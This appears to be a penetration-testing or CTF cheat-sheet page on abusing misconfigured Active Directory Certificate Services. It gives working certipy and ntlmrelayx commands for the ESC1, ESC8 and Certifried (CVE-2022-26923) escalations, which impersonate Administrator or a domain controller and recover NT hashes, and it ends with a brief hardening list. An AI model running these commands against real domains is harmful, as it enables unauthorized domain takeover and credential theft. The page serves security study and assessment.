ADCS
aka Active Directory Certificate Services, Certificate Authority
Active Directory Certificate Services. Misconfigured certificate templates (ESC1 to ESC16) let a low-privileged user enroll a certificate that authenticates as a privileged account.
Ports
| Port | Proto | Notes |
|---|---|---|
443 | tcp | web enrollment (certsrv), ESC8 relay target |
445 | tcp | RPC enrollment over SMB |
Fingerprint
- certipy find / certutil reveal the CA and templates
- A Certificate Authority object exists in AD (pKIEnrollmentService)
Key files
| Path | Holds | Sensitive |
|---|---|---|
vulnerable certificate templates | enrollee-supplied subject or dangerous EKUs | sensitive |
CA private key (on the CA host) | forge any certificate (golden cert) | sensitive |
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-26923 | Certifried, machine-account certificate to Domain Admin |
Exploitation primitives
- certipy find -vulnerable enumerates ESC1 to ESC16 misconfigurations
- ESC1: template allows enrollee-supplied subject, request a cert as Administrator and authenticate (PKINIT)
- ESC8: NTLM-relay a machine account to the web-enrollment endpoint
- ESC16 and others: request, then auth with the cert to recover the target NT hash, no password reset needed
Overview
ADCS issues certificates inside the domain. When a template is misconfigured, a normal user can request a certificate that proves they are someone far more privileged, then use it to authenticate and pull that account’s hash.
Enumeration
certipy find -u user@dom.local -p pass -dc-ip <TARGET> -vulnerable -stdoutESC1 example
Request a certificate as Administrator:
certipy req -u user@dom.local -p pass -ca <CA> -template <tmpl> -upn administrator@dom.localAuthenticate with it to recover a TGT and the NT hash:
certipy auth -pfx administrator.pfx -dc-ip <TARGET>ESC8 — NTLM relay to web enrollment
Start the relay against the CA’s enrollment endpoint:
ntlmrelayx.py -t http://<CA>/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerCoerce a DC to authenticate (PetitPotam / printerbug), catch the cert, then certipy auth it for the DC’s TGT.
Certifried (CVE-2022-26923)
Create a machine account, set its dNSHostName to a DC, request a cert, and authenticate as the DC:
certipy account create -u user@dom.local -p pass -dc-ip <TARGET> -user 'evilpc' -dns dc.dom.localcertipy req -u 'evilpc$' -p pass -ca <CA> -template MachineHardening
Remove enrollee-supplied-subject on auth templates, restrict enrollment rights, enable the ESC8 mitigations (EPA / require signing), and audit template ACLs.
Seen on these machines 4
